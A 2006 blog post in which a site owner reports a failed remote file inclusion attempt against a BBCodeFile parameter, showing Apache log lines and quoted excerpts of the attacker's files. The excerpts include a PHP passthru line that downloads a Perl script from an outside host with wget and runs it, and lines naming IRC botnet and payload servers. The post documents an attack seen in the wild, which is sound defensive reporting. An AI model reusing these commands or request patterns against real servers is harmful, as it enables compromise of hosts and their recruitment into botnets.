script kiddies go home.

Yeesh, another day another set of lame attacks. This hack attempt tries to use BBCodeFile. This one like the first one from last week, attempts to join an IRC botnet. Attempts to get files from the full-comandos.com website. Also contains the following text in the files it attempts to download. I’ve renamed the file extensions so accidents are less likely to happen with this code.

lol.gif.txt:@passthru('cd /tmp;wget http://jaheem.by.ru/tes.pl;perl tes.pljaheem;rm -tes.pl*');
...
r.gif.txt: $mhost = 'http://opersconexion.port5.com?';
r.gif.txt: $bt = 'http://www.full-comandos.com/jobing/r0nin';
r.gif.txt: $dc = 'http://www.full-comandos.com/jobing/dc.txt';
...
tes.pl.txt:$cmd="http://jaheem.by.ru/r.gif?";
...
#ANTICLONE 1337 :p
...
# MORGAN OWNED YOUR BOX
# www.FST-Production
# irc.gigachat.net - #Morgan

well this is enough boredom for me, for now.

attack log

px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:43:49 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:43:50 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:43:52 -0700] "GET //tags/security/feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:43:53 -0700] "GET ///tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 54088 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:45:04 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:45:06 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:45:08 -0700] "GET //tags/security/feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:45:06 -0700] "GET ///tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 54088 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:45:50 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:45:52 -0700] "GET //tags/security/feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:46:08 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:46:10 -0700] "GET ///tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 54088 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:46:48 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:46:49 -0700] "GET //tags/security/feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:47:27 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:47:29 -0700] "GET ///tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 54088 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:47:30 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:47:31 -0700] "GET //tags/security/feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.

Related posts:

  1. CIA currently under attack. ...
  2. someone being bad I noticed someone/thing trying to do something nasty to my...
  3. wordtube? I saw something interesting in my apache log. blog.px.ns1.net 72.36.146.234...
  4. lame xss hack attempt. I just happened to catch this in my logs. It...
  5. wordtube deleted. OK, over the past week+ after updating this plugin, my...

This entry was written by px, posted on 2006.12.31 at 8:07 am PST, filed under internet and tagged , , , . Bookmark the permalink. Follow any comments here with the RSS feed for this post. Post a comment or leave a trackback: Trackback URL.

Post a Comment

Your email is never published nor shared. Required fields are marked *

*
*

Bad Behavior has blocked 902 access attempts in the last 7 days.